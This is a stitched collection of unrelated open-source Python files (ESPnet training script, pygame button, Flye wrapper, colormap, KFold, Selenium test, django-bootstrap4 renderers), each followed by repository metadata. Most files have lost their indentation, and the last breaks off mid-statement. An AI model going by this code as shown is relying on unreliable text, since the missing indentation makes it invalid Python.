"--criterion",
default="acc",
type=str,
choices=["loss", "acc"],
help="Criterion to perform epsilon decay",
)
parser.add_argument(
"--threshold", default=1e-4, type=float, help="Threshold to stop iteration"
)
parser.add_argument(
"--epochs", "-e", default=30, type=int, help="Maximum number of epochs"
)
parser.add_argument(
"--early-stop-criterion",
default="validation/main/acc",
type=str,
nargs="?",
help="Value to monitor to trigger an early stopping of the training",
)
parser.add_argument(
"--patience",
default=3,
type=int,
nargs="?",
help="Number of epochs to wait without improvement "
"before stopping the training",
)
parser.add_argument(
"--grad-clip", default=5, type=float, help="Gradient norm threshold to clip"
)
parser.add_argument(
"--num-save-attention",
default=3,
type=int,
help="Number of samples of attention to be saved",
)
parser.add_argument(
"--num-save-ctc",
default=3,
type=int,
help="Number of samples of CTC probability to be saved",
)
parser.add_argument(
"--grad-noise",
type=strtobool,
default=False,
help="The flag to switch to use noise injection to gradients during training",
)
# asr_mix related
parser.add_argument(
"--num-spkrs",
default=1,
type=int,
choices=[1, 2],
help="Number of speakers in the speech.",
)
# decoder related
parser.add_argument(
"--context-residual",
default=False,
type=strtobool,
nargs="?",
help="The flag to switch to use context vector residual in the decoder network",
)
# finetuning related
parser.add_argument(
"--enc-init",
default=None,
type=str,
help="Pre-trained ASR model to initialize encoder.",
)
parser.add_argument(
"--enc-init-mods",
default="enc.enc.",
type=lambda s: [str(mod) for mod in s.split(",") if s != ""],
help="List of encoder modules to initialize, separated by a comma.",
)
parser.add_argument(
"--dec-init",
default=None,
type=str,
help="Pre-trained ASR, MT or LM model to initialize decoder.",
)
parser.add_argument(
"--dec-init-mods",
default="att., dec.",
type=lambda s: [str(mod) for mod in s.split(",") if s != ""],
help="List of decoder modules to initialize, separated by a comma.",
)
parser.add_argument(
"--freeze-mods",
default=None,
type=lambda s: [str(mod) for mod in s.split(",") if s != ""],
help="List of modules to freeze, separated by a comma.",
)
# front end related
parser.add_argument(
"--use-frontend",
type=strtobool,
default=False,
help="The flag to switch to use frontend system.",
)
# WPE related
parser.add_argument(
"--use-wpe",
type=strtobool,
default=False,
help="Apply Weighted Prediction Error",
)
parser.add_argument(
"--wtype",
default="blstmp",
type=str,
choices=[
"lstm",
"blstm",
"lstmp",
"blstmp",
"vgglstmp",
"vggblstmp",
"vgglstm",
"vggblstm",
"gru",
"bgru",
"grup",
"bgrup",
"vgggrup",
"vggbgrup",
"vgggru",
"vggbgru",
],
help="Type of encoder network architecture "
"of the mask estimator for WPE. "
"",
)
parser.add_argument("--wlayers", type=int, default=2, help="")
parser.add_argument("--wunits", type=int, default=300, help="")
parser.add_argument("--wprojs", type=int, default=300, help="")
parser.add_argument("--wdropout-rate", type=float, default=0.0, help="")
parser.add_argument("--wpe-taps", type=int, default=5, help="")
parser.add_argument("--wpe-delay", type=int, default=3, help="")
parser.add_argument(
"--use-dnn-mask-for-wpe",
type=strtobool,
default=False,
help="Use DNN to estimate the power spectrogram. "
"This option is experimental.",
)
# Beamformer related
parser.add_argument("--use-beamformer", type=strtobool, default=True, help="")
parser.add_argument(
"--btype",
default="blstmp",
type=str,
choices=[
"lstm",
"blstm",
"lstmp",
"blstmp",
"vgglstmp",
"vggblstmp",
"vgglstm",
"vggblstm",
"gru",
"bgru",
"grup",
"bgrup",
"vgggrup",
"vggbgrup",
"vgggru",
"vggbgru",
],
help="Type of encoder network architecture "
"of the mask estimator for Beamformer.",
)
parser.add_argument("--blayers", type=int, default=2, help="")
parser.add_argument("--bunits", type=int, default=300, help="")
parser.add_argument("--bprojs", type=int, default=300, help="")
parser.add_argument("--badim", type=int, default=320, help="")
parser.add_argument(
"--bnmask",
type=int,
default=2,
help="Number of beamforming masks, " "default is 2 for [speech, noise].",
)
parser.add_argument(
"--ref-channel",
type=int,
default=-1,
help="The reference channel used for beamformer. "
"By default, the channel is estimated by DNN.",
)
parser.add_argument("--bdropout-rate", type=float, default=0.0, help="")
# Feature transform: Normalization
parser.add_argument(
"--stats-file",
type=str,
default=None,
help="The stats file for the feature normalization",
)
parser.add_argument(
"--apply-uttmvn",
type=strtobool,
default=True,
help="Apply utterance level mean " "variance normalization.",
)
parser.add_argument("--uttmvn-norm-means", type=strtobool, default=True, help="")
parser.add_argument("--uttmvn-norm-vars", type=strtobool, default=False, help="")
# Feature transform: Fbank
parser.add_argument(
"--fbank-fs",
type=int,
default=16000,
help="The sample frequency used for " "the mel-fbank creation.",
)
parser.add_argument(
"--n-mels", type=int, default=80, help="The number of mel-frequency bins."
)
parser.add_argument("--fbank-fmin", type=float, default=0.0, help="")
parser.add_argument("--fbank-fmax", type=float, default=None, help="")
return parser
def main(cmd_args):
"""Run the main training function."""
parser = get_parser()
args, _ = parser.parse_known_args(cmd_args)
if args.backend == "chainer" and args.train_dtype != "float32":
raise NotImplementedError(
f"chainer backend does not support --train-dtype {args.train_dtype}."
"Use --dtype float32."
)
if args.ngpu == 0 and args.train_dtype in ("O0", "O1", "O2", "O3", "float16"):
raise ValueError(
f"--train-dtype {args.train_dtype} does not support the CPU backend."
)
from espnet.utils.dynamic_import import dynamic_import
if args.model_module is None:
model_module = "espnet.nets." + args.backend + "_backend.e2e_asr:E2E"
else:
model_module = args.model_module
model_class = dynamic_import(model_module)
model_class.add_arguments(parser)
args = parser.parse_args(cmd_args)
args.model_module = model_module
if "chainer_backend" in args.model_module:
args.backend = "chainer"
if "pytorch_backend" in args.model_module:
args.backend = "pytorch"
# logging info
if args.verbose > 0:
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
logging.basicConfig(
level=logging.WARN,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
logging.warning("Skip DEBUG/INFO messages")
# If --ngpu is not given,
# 1. if CUDA_VISIBLE_DEVICES is set, all visible devices
# 2. if nvidia-smi exists, use all devices
# 3. else ngpu=0
if args.ngpu is None:
cvd = os.environ.get("CUDA_VISIBLE_DEVICES")
if cvd is not None:
ngpu = len(cvd.split(","))
else:
logging.warning("CUDA_VISIBLE_DEVICES is not set.")
try:
p = subprocess.run(
["nvidia-smi", "-L"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
except (subprocess.CalledProcessError, FileNotFoundError):
ngpu = 0
else:
                # count the GPU entries listed by `nvidia-smi -L` (one per line on stdout)
                ngpu = len(p.stdout.decode().split("\n")) - 1
else:
if is_torch_1_2_plus and args.ngpu != 1:
logging.debug(
"There are some bugs with multi-GPU processing in PyTorch 1.2+"
+ " (see https://github.com/pytorch/pytorch/issues/21108)"
)
ngpu = args.ngpu
logging.info(f"ngpu: {ngpu}")
# display PYTHONPATH
logging.info("python path = " + os.environ.get("PYTHONPATH", "(None)"))
# set random seed
logging.info("random seed = %d" % args.seed)
random.seed(args.seed)
np.random.seed(args.seed)
# load dictionary for debug log
if args.dict is not None:
with open(args.dict, "rb") as f:
dictionary = f.readlines()
char_list = [entry.decode("utf-8").split(" ")[0] for entry in dictionary]
char_list.insert(0, "<blank>")
char_list.append("<eos>")
# for non-autoregressive training using Transformer
if hasattr(args, "decoder_mode") and args.decoder_mode == "maskctc":
char_list.append("<mask>")
args.char_list = char_list
else:
args.char_list = None
# train
logging.info("backend = " + args.backend)
if args.num_spkrs == 1:
if args.backend == "chainer":
from espnet.asr.chainer_backend.asr import train
train(args)
elif args.backend == "pytorch":
from espnet.asr.pytorch_backend.asr import train
train(args)
else:
raise ValueError("Only chainer and pytorch are supported.")
else:
# FIXME(kamo): Support --model-module
if args.backend == "pytorch":
from espnet.asr.pytorch_backend.asr_mix import train
train(args)
else:
raise ValueError("Only pytorch is supported.")
if __name__ == "__main__":
main(sys.argv[1:])
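# Illustrative invocation (added note; not part of the original script). The
# file paths and hyper-parameter values below are hypothetical placeholders,
# and a real run also needs the data/configuration options defined earlier in
# this parser:
#
#   python asr_train.py \
#       --ngpu 1 --backend pytorch \
#       --dict data/lang_char/units.txt \
#       --valid-json dump/dev/data.json \
#       --opt adadelta --epochs 30 --mtlalpha 0.5 --batch-bins 800000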
| 31.438871 | 88 | 0.577376 | [
"Apache-2.0"
] | Advanjef/espnet | espnet/bin/asr_train.py | 20,058 | Python |
# -*- coding=utf-8 -*-
import pygame
from pygame.locals import MOUSEBUTTONDOWN
from pybfcontrol.bf_common import BFControlId,BFBase, TEXT_ALIGN_LEFT,TEXT_ALIGN_MIDDLE
CLICK_EFFECT_TIME = 100
PADING = 4
class BFButton(BFBase):
def __init__(self, parent, rect, text='Button', click=None):
super(BFButton, self).__init__()
self.x,self.y,self.width,self.height = rect
self.bg_color = (225,225,225)
self.parent = parent
self.surface = parent.subsurface(rect)
self.is_hover = False
self.in_click = False
self.click_loss_time = 0
self.click_event_id = -1
self.ctl_id = BFControlId().instance().get_new_id()
self._text = text
self._click = click
self.init_font()
def init_font(self):
        text_color = 100, 100, 100  # dark grey used for the button label
        self.textImage = self.font.render(self._text, True, text_color)
w, h = self.textImage.get_size()
self._ty = (self.height - h) / 2
if self._text_align == TEXT_ALIGN_LEFT:
self._tx = PADING
elif self._text_align == TEXT_ALIGN_MIDDLE:
self._tx = (self.width - PADING - w) / 2
else:
self._tx = (self.width - PADING * 2 - w)
@property
def text(self):
return self._text
@text.setter
def text(self, value):
self._text = value
self.init_font()
@property
def click(self):
return self._click
@click.setter
def click(self, value):
self._click = value
def clear_hover(self):
self.is_hover = False
def update(self, event):
if self.in_click and event.type == pygame.USEREVENT+1 and BFControlId().instance().click_id == self.ctl_id:
if self._click: self._click(self)
self.click_event_id = -1
return True
x, y = pygame.mouse.get_pos()
if x > self.x and x < self.x + self.width and y > self.y and y < self.y + self.height:
if self.panel: self.panel.clear_hover()
self.is_hover = True
if event.type == MOUSEBUTTONDOWN:
pressed_array = pygame.mouse.get_pressed()
if pressed_array[0]:
self.in_click = True
if self.panel: self.panel.clear_foucs()
self.click_loss_time = pygame.time.get_ticks() + CLICK_EFFECT_TIME
BFControlId().instance().click_id = self.ctl_id
pygame.time.set_timer(pygame.USEREVENT+1,CLICK_EFFECT_TIME-10)
return True
else:
self.is_hover = False
return False
def draw(self):
if self.in_click:
if self.click_loss_time < pygame.time.get_ticks():
self.in_click = False
if not self._visible:
return
if self.in_click:
r,g,b = self.bg_color
k = 0.95
self.surface.fill((r*k, g*k, b*k))
else:
self.surface.fill(self.bg_color)
if self.is_hover:
pygame.draw.rect(self.surface, (0,0,0), (0,0,self.width,self.height), 1)
pygame.draw.rect(self.surface, (100,100,100), (0,0,self.width-1,self.height-1), 1)
layers = 5
r_step = (210-170)/layers
g_step = (225-205)/layers
for i in range(layers):
pygame.draw.rect(self.surface, (170+r_step*i, 205+g_step*i, 255), (i, i, self.width - 2 - i*2, self.height - 2 - i*2), 1)
else:
self.surface.fill(self.bg_color)
pygame.draw.rect(self.surface, (0,0,0), (0,0,self.width,self.height), 1)
pygame.draw.rect(self.surface, (100,100,100), (0,0,self.width-1,self.height-1), 1)
pygame.draw.rect(self.surface, self.bg_color, (0,0,self.width-2,self.height-2), 1)
self.surface.blit(self.textImage, (self._tx, self._ty))
class BFButtonGroup(object):
def __init__(self):
self.btn_list = []
def add_button(self, button):
self.btn_list.append(button)
def make_button(self, screen, rect, text='Button', click=None):
button = BFButton(screen, rect,text=text,click=click)
self.add_button(button)
def update(self, event):
for button in self.btn_list: button.update(event)
def draw(self):
for button in self.btn_list: button.draw()
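# Illustrative sketch (added; not part of the original module): wiring a
# BFButtonGroup into a minimal event loop. The window size, button geometry
# and the callback below are hypothetical placeholders.
def _example_button_loop():
    pygame.init()
    screen = pygame.display.set_mode((320, 240))
    group = BFButtonGroup()
    group.make_button(screen, (40, 40, 120, 40), text='OK',
                      click=lambda btn: print('clicked', btn.text))
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            group.update(event)
        group.draw()
        pygame.display.flip()
    pygame.quit()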
| 35.430894 | 137 | 0.583983 | [
"MIT"
] | zhangenter/bf_control | pybfcontrol/bf_button.py | 4,358 | Python |
#(c) 2016 by Authors
#This file is a part of ABruijn program.
#Released under the BSD license (see LICENSE file)
"""
Runs repeat/contigger binary
"""
from __future__ import absolute_import
import subprocess
import logging
import os
from flye.utils.utils import which
REPEAT_BIN = "flye-modules"
CONTIGGER_BIN = "flye-modules"
logger = logging.getLogger()
class RepeatException(Exception):
pass
def check_binaries():
if not which(REPEAT_BIN) or not which(CONTIGGER_BIN):
raise RepeatException("Repeat/contigger binaries were not found. "
"Did you run 'make'?")
try:
devnull = open(os.devnull, "w")
subprocess.check_call([REPEAT_BIN, "repeat", "-h"], stderr=devnull)
except subprocess.CalledProcessError as e:
raise RepeatException(str(e))
except OSError as e:
raise RepeatException(str(e))
def analyse_repeats(args, run_params, input_assembly, out_folder,
log_file, config_file):
logger.debug("-----Begin repeat analyser log------")
cmdline = [REPEAT_BIN, "repeat", "--disjointigs", input_assembly,
"--reads", ",".join(args.reads), "--out-dir", out_folder,
"--config", config_file, "--log", log_file,
"--threads", str(args.threads)]
if args.debug:
cmdline.append("--debug")
if args.meta:
cmdline.append("--meta")
if args.keep_haplotypes:
cmdline.append("--keep-haplotypes")
#if args.kmer_size:
# cmdline.extend(["--kmer", str(args.kmer_size)])
cmdline.extend(["--min-ovlp", str(run_params["min_overlap"])])
if args.hifi_error:
cmdline.extend(["--extra-params",
"repeat_graph_ovlp_divergence={}".format(args.hifi_error)])
try:
logger.debug("Running: " + " ".join(cmdline))
subprocess.check_call(cmdline)
except subprocess.CalledProcessError as e:
if e.returncode == -9:
logger.error("Looks like the system ran out of memory")
raise RepeatException(str(e))
except OSError as e:
raise RepeatException(str(e))
def generate_contigs(args, run_params, graph_edges, out_folder,
log_file, config_file, repeat_graph, reads_alignment):
logger.debug("-----Begin contigger analyser log------")
cmdline = [CONTIGGER_BIN, "contigger", "--graph-edges", graph_edges,
"--reads", ",".join(args.reads), "--out-dir", out_folder,
"--config", config_file, "--repeat-graph", repeat_graph,
"--graph-aln", reads_alignment, "--log", log_file,
"--threads", str(args.threads)]
if args.debug:
cmdline.append("--debug")
if args.keep_haplotypes:
cmdline.append("--no-scaffold")
#if args.kmer_size:
# cmdline.extend(["--kmer", str(args.kmer_size)])
cmdline.extend(["--min-ovlp", str(run_params["min_overlap"])])
try:
logger.debug("Running: " + " ".join(cmdline))
subprocess.check_call(cmdline)
except subprocess.CalledProcessError as e:
if e.returncode == -9:
logger.error("Looks like the system ran out of memory")
raise RepeatException(str(e))
except OSError as e:
raise RepeatException(str(e))
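# Illustrative sketch (added note; not part of the original module). The
# argparse-style namespace attributes and the file paths below are
# hypothetical placeholders:
#
#   from argparse import Namespace
#   args = Namespace(reads=["reads.fastq"], threads=8, debug=False, meta=False,
#                    keep_haplotypes=False, hifi_error=None)
#   check_binaries()
#   analyse_repeats(args, {"min_overlap": 1000}, "disjointigs.fasta",
#                   "out_repeat", "flye.log", "asm.cfg")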
| 33.865979 | 83 | 0.624353 | [
"BSD-3-Clause"
] | arun-sub/Flye | flye/assembly/repeat_graph.py | 3,285 | Python |
import json
import typing
import collections
from matplotlib import cm
from matplotlib.colors import Normalize, to_hex, CSS4_COLORS, BASE_COLORS
import matplotlib.pyplot as plt
from clldutils.color import qualitative_colors, sequential_colors, rgb_as_hex
from cldfviz.multiparameter import CONTINUOUS, CATEGORICAL, Parameter
__all__ = ['COLORMAPS', 'hextriplet', 'Colormap']
COLORMAPS = {
CATEGORICAL: ['boynton', 'tol', 'base', 'seq'],
CONTINUOUS: [cm for cm in plt.colormaps() if not cm.endswith('_r')],
}
def hextriplet(s):
"""
Wrap clldutils.color.rgb_as_hex to provide unified error handling.
"""
if s in BASE_COLORS:
return rgb_as_hex([float(d) for d in BASE_COLORS[s]])
if s in CSS4_COLORS:
return CSS4_COLORS[s]
try:
return rgb_as_hex(s)
except (AssertionError, ValueError) as e:
raise ValueError('Invalid color spec: "{}" ({})'.format(s, str(e)))
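# Illustrative examples (added note): a matplotlib base colour key such as 'g',
# a CSS4 colour name such as 'tomato', or an explicit '#rrggbb' string are all
# normalised to a hex triplet; anything rgb_as_hex cannot parse raises ValueError.
#
#   hextriplet('g')        # base colour, converted via rgb_as_hex
#   hextriplet('tomato')   # CSS4 name, returned as its hex value
#   hextriplet('#00ff00')  # explicit spec, normalised by rgb_as_hex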
class Colormap:
def __init__(self, parameter: Parameter, name: typing.Optional[str] = None, novalue=None):
domain = parameter.domain
self.explicit_cm = None
if name and name.startswith('{'):
self.explicit_cm = collections.OrderedDict()
raw = json.loads(name, object_pairs_hook=collections.OrderedDict)
if novalue:
raw.setdefault('None', novalue)
label_to_code = {v: k for k, v in parameter.domain.items()}
for v, c in raw.items():
if (v not in parameter.value_to_code) and v not in label_to_code:
raise ValueError('Colormap value "{}" not in domain {}'.format(
v, list(parameter.value_to_code.keys())))
v = parameter.value_to_code.get(v, label_to_code.get(v))
self.explicit_cm[v] = hextriplet(c)
vals = list(parameter.value_to_code)
if len(vals) > len(self.explicit_cm):
raise ValueError('Colormap {} does not cover all values {}!'.format(
dict(raw), vals))
name = None
# reorder the domain of the parameter (and prune it to valid values):
parameter.domain = collections.OrderedDict(
(c, l) for c, l in sorted(
[i for i in parameter.domain.items() if i[0] in self.explicit_cm],
key=lambda i: list(self.explicit_cm.keys()).index(i[0]))
)
self.novalue = hextriplet(novalue) if novalue else None
self._cm = getattr(cm, name or 'yyy', cm.jet)
if isinstance(domain, tuple):
assert not self.explicit_cm
# Initialize matplotlib colormap and normalizer:
norm = Normalize(domain[0], domain[1])
self.cm = lambda v: to_hex(self._cm(norm(float(v))))
else:
if self.explicit_cm:
self.cm = lambda v: self.explicit_cm[v]
else:
if name == 'seq':
colors = sequential_colors(len(domain))
else:
colors = qualitative_colors(len(domain), set=name)
self.cm = lambda v: dict(zip(domain, colors))[v]
def scalar_mappable(self):
return cm.ScalarMappable(norm=None, cmap=self._cm)
def __call__(self, value):
if value is None:
return self.novalue
return self.cm(value)
| 39.835294 | 94 | 0.599232 | [
"Apache-2.0"
] | cldf/cldfviz | src/cldfviz/colormap.py | 3,386 | Python |
import torch
class KFold:
def __init__(self, dataset, n_fold=10, batch_size=32, num_workers=0, pin_memory=False):
self.fold = 0
self.batch_size = batch_size
self.num_workers = num_workers
self.pin_memory = pin_memory
self.dataset = dataset
self.n_fold = n_fold
self.fold_size = len(self.dataset) // self.n_fold
self.folded_size = self.n_fold * self.fold_size
self.fold_idx = self.fold_split()
def fold_split(self, random_seed=None):
"""
Splitting the folds.
Args:
random_seed: Random seed for reproducibility
Returns:
tensor containing indices for folds, where dim=0 is the fold number
"""
if random_seed is not None:
torch.manual_seed(random_seed)
fold_idx = torch.randperm(self.dataset.__len__())
fold_idx = fold_idx[:self.folded_size].view(-1, self.fold_size)
return fold_idx
def fold_loaders(self, fold=-1):
"""
Loading a specific fold as train and test data loader. If no fold number is provided it returns the next fold. It returns a randomly sampled subset of
the original data set.
Args:
fold: fold number to return
Returns:
(train data loader, test data loader)
"""
if fold == -1:
fold = self.fold
test_fold_idx = self.fold_idx[fold]
train_fold_idx = self.fold_idx[[i for i in range(self.n_fold) if i != fold]].view(-1)
train_loader = torch.utils.data.DataLoader(self.dataset,
batch_size=self.batch_size, # args.batch_size,
num_workers=self.num_workers, # args.loader_num_workers,
pin_memory=self.pin_memory,
sampler=torch.utils.data.SubsetRandomSampler(train_fold_idx))
test_loader = torch.utils.data.DataLoader(self.dataset,
batch_size=self.batch_size, # args.batch_size,
num_workers=self.num_workers, # args.loader_num_workers,
pin_memory=self.pin_memory,
sampler=torch.utils.data.SubsetRandomSampler(test_fold_idx))
self.fold = (self.fold + 1) % self.n_fold
return train_loader, test_loader
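# Illustrative sketch (added; not part of the original module): iterating over
# all folds of a toy TensorDataset. The sizes and tensors below are
# hypothetical placeholders.
def _example_kfold_run():
    from torch.utils.data import TensorDataset
    toy = TensorDataset(torch.randn(100, 3), torch.randint(0, 2, (100,)))
    kfold = KFold(toy, n_fold=5, batch_size=16)
    for fold in range(kfold.n_fold):
        train_loader, test_loader = kfold.fold_loaders(fold)
        # ... train on train_loader, then evaluate on test_loader ...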
| 39.353846 | 158 | 0.555903 | [
"MIT"
] | raharth/PyMatch | pymatch/utils/KFold.py | 2,558 | Python |
# -*- coding: utf-8 -*- #
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.appengine.api import users
from google.appengine.ext import webapp
from util import *
import webapp2
class WhoAmIHandler(webapp2.RequestHandler):
def get(self):
self.response.out.write(Util.getUsernameFromEmail(users.get_current_user().email()))
app = webapp2.WSGIApplication(
[
('/whoami', WhoAmIHandler),
], debug=True)
| 27.714286 | 88 | 0.736082 | [
"Apache-2.0"
] | lmanul/awty | whoami.py | 970 | Python |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
MAJOR = 1
MINOR = 7
PATCH = 0
PRE_RELEASE = 'rc'
# Use the following formatting: (major, minor, patch, pre-release)
VERSION = (MAJOR, MINOR, PATCH, PRE_RELEASE)
__shortversion__ = '.'.join(map(str, VERSION[:3]))
__version__ = '.'.join(map(str, VERSION[:3])) + ''.join(VERSION[3:])
__package_name__ = 'nemo_toolkit'
__contact_names__ = 'NVIDIA'
__contact_emails__ = '[email protected]'
__homepage__ = 'https://docs.nvidia.com/deeplearning/nemo/user-guide/docs/en/stable/'
__repository_url__ = 'https://github.com/nvidia/nemo'
__download_url__ = 'https://github.com/NVIDIA/NeMo/releases'
__description__ = 'NeMo - a toolkit for Conversational AI'
__license__ = 'Apache2'
__keywords__ = 'deep learning, machine learning, gpu, NLP, NeMo, nvidia, pytorch, torch, tts, speech, language'
| 38.944444 | 111 | 0.74679 | [
"Apache-2.0"
] | btarjan/NeMo | nemo/package_info.py | 1,402 | Python |
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from selenium.common.exceptions import TimeoutException
class TestPageLoadTimeout(object):
@pytest.mark.xfail_phantomjs(
reason='PhantomJS does not implement page load timeouts')
def testShouldTimeoutOnPageLoadTakingTooLong(self, driver, pages):
driver.set_page_load_timeout(0.01)
with pytest.raises(TimeoutException):
pages.load("simpleTest.html")
@pytest.mark.xfail_marionette(
reason='https://bugzilla.mozilla.org/show_bug.cgi?id=1309231')
@pytest.mark.xfail_phantomjs(
reason='PhantomJS does not implement page load timeouts')
def testClickShouldTimeout(self, driver, pages):
pages.load("simpleTest.html")
driver.set_page_load_timeout(0.01)
with pytest.raises(TimeoutException):
driver.find_element_by_id("multilinelink").click()
| 40.219512 | 70 | 0.745907 | [
"Apache-2.0"
] | shubhramittal/selenium | py/test/selenium/webdriver/common/page_load_timeout_tests.py | 1,649 | Python |
from bs4 import BeautifulSoup
from django.forms import (
BaseForm,
BaseFormSet,
BoundField,
CheckboxInput,
CheckboxSelectMultiple,
DateInput,
EmailInput,
FileInput,
MultiWidget,
NumberInput,
PasswordInput,
RadioSelect,
Select,
SelectDateWidget,
TextInput,
URLInput,
)
from django.utils.html import conditional_escape, escape, strip_tags
from django.utils.safestring import mark_safe
from .bootstrap import get_bootstrap_setting
from .exceptions import BootstrapError
from .forms import (
FORM_GROUP_CLASS,
is_widget_with_placeholder,
render_field,
render_form,
render_form_group,
render_label,
)
from .text import text_value
from .utils import add_css_class, render_template_file
try:
# If Django is set up without a database, importing this widget gives RuntimeError
from django.contrib.auth.forms import ReadOnlyPasswordHashWidget
except RuntimeError:
ReadOnlyPasswordHashWidget = None
class BaseRenderer(object):
"""A content renderer."""
def __init__(self, *args, **kwargs):
self.layout = kwargs.get("layout", "")
self.form_group_class = kwargs.get("form_group_class", FORM_GROUP_CLASS)
self.field_class = kwargs.get("field_class", "")
self.label_class = kwargs.get("label_class", "")
self.show_help = kwargs.get("show_help", True)
self.show_label = kwargs.get("show_label", True)
self.exclude = kwargs.get("exclude", "")
self.set_placeholder = kwargs.get("set_placeholder", True)
self.size = self.parse_size(kwargs.get("size", ""))
self.horizontal_label_class = kwargs.get(
"horizontal_label_class", get_bootstrap_setting("horizontal_label_class")
)
self.horizontal_field_class = kwargs.get(
"horizontal_field_class", get_bootstrap_setting("horizontal_field_class")
)
def parse_size(self, size):
size = text_value(size).lower().strip()
if size in ("sm", "small"):
return "small"
if size in ("lg", "large"):
return "large"
if size in ("md", "medium", ""):
return "medium"
raise BootstrapError('Invalid value "%s" for parameter "size" (expected "sm", "md", "lg" or "").' % size)
def get_size_class(self, prefix="form-control"):
if self.size == "small":
return prefix + "-sm"
if self.size == "large":
return prefix + "-lg"
return ""
def _render(self):
return ""
def render(self):
return mark_safe(self._render())
class FormsetRenderer(BaseRenderer):
"""Default formset renderer."""
def __init__(self, formset, *args, **kwargs):
if not isinstance(formset, BaseFormSet):
raise BootstrapError('Parameter "formset" should contain a valid Django Formset.')
self.formset = formset
super().__init__(*args, **kwargs)
def render_management_form(self):
return text_value(self.formset.management_form)
def render_form(self, form, **kwargs):
return render_form(form, **kwargs)
def render_forms(self):
rendered_forms = []
for form in self.formset.forms:
rendered_forms.append(
self.render_form(
form,
layout=self.layout,
form_group_class=self.form_group_class,
field_class=self.field_class,
label_class=self.label_class,
show_label=self.show_label,
show_help=self.show_help,
exclude=self.exclude,
set_placeholder=self.set_placeholder,
size=self.size,
horizontal_label_class=self.horizontal_label_class,
horizontal_field_class=self.horizontal_field_class,
)
)
return "\n".join(rendered_forms)
def get_formset_errors(self):
return self.formset.non_form_errors()
def render_errors(self):
formset_errors = self.get_formset_errors()
if formset_errors:
return render_template_file(
"bootstrap4/form_errors.html",
context={"errors": formset_errors, "form": self.formset, "layout": self.layout},
)
return ""
def _render(self):
return "".join([self.render_errors(), self.render_management_form(), self.render_forms()])
class FormRenderer(BaseRenderer):
"""Default form renderer."""
def __init__(self, form, *args, **kwargs):
if not isinstance(form, BaseForm):
raise BootstrapError('Parameter "form" should contain a valid Django Form.')
self.form = form
super().__init__(*args, **kwargs)
self.error_css_class = kwargs.get("error_css_class", None)
self.required_css_class = kwargs.get("required_css_class", None)
self.bound_css_class = kwargs.get("bound_css_class", None)
self.alert_error_type = kwargs.get("alert_error_type", "non_fields")
self.form_check_class = kwargs.get("form_check_class", "form-check")
def render_fields(self):
rendered_fields = []
for field in self.form:
rendered_fields.append(
render_field(
field,
layout=self.layout,
form_group_class=self.form_group_class,
field_class=self.field_class,
label_class=self.label_class,
form_check_class=self.form_check_class,
show_label=self.show_label,
show_help=self.show_help,
exclude=self.exclude,
set_placeholder=self.set_placeholder,
size=self.size,
horizontal_label_class=self.horizontal_label_class,
horizontal_field_class=self.horizontal_field_class,
error_css_class=self.error_css_class,
required_css_class=self.required_css_class,
bound_css_class=self.bound_css_class,
)
)
return "\n".join(rendered_fields)
def get_fields_errors(self):
form_errors = []
for field in self.form:
if not field.is_hidden and field.errors:
form_errors += field.errors
return form_errors
def render_errors(self, type="all"):
form_errors = None
if type == "all":
form_errors = self.get_fields_errors() + self.form.non_field_errors()
elif type == "fields":
form_errors = self.get_fields_errors()
elif type == "non_fields":
form_errors = self.form.non_field_errors()
if form_errors:
return render_template_file(
"bootstrap4/form_errors.html",
context={"errors": form_errors, "form": self.form, "layout": self.layout, "type": type},
)
return ""
def _render(self):
return self.render_errors(self.alert_error_type) + self.render_fields()
class FieldRenderer(BaseRenderer):
"""Default field renderer."""
# These widgets will not be wrapped in a form-control class
WIDGETS_NO_FORM_CONTROL = (CheckboxInput, RadioSelect, CheckboxSelectMultiple, FileInput)
def __init__(self, field, *args, **kwargs):
if not isinstance(field, BoundField):
raise BootstrapError('Parameter "field" should contain a valid Django BoundField.')
self.field = field
super().__init__(*args, **kwargs)
self.widget = field.field.widget
self.is_multi_widget = isinstance(field.field.widget, MultiWidget)
self.initial_attrs = self.widget.attrs.copy()
self.field_help = text_value(mark_safe(field.help_text)) if self.show_help and field.help_text else ""
self.field_errors = [conditional_escape(text_value(error)) for error in field.errors]
self.form_check_class = kwargs.get("form_check_class", "form-check")
if "placeholder" in kwargs:
# Find the placeholder in kwargs, even if it's empty
self.placeholder = kwargs["placeholder"]
elif get_bootstrap_setting("set_placeholder"):
# If not found, see if we set the label
self.placeholder = field.label
else:
# Or just set it to empty
self.placeholder = ""
if self.placeholder:
self.placeholder = text_value(self.placeholder)
self.addon_before = kwargs.get("addon_before", self.widget.attrs.pop("addon_before", ""))
self.addon_after = kwargs.get("addon_after", self.widget.attrs.pop("addon_after", ""))
self.addon_before_class = kwargs.get(
"addon_before_class", self.widget.attrs.pop("addon_before_class", "input-group-text")
)
self.addon_after_class = kwargs.get(
"addon_after_class", self.widget.attrs.pop("addon_after_class", "input-group-text")
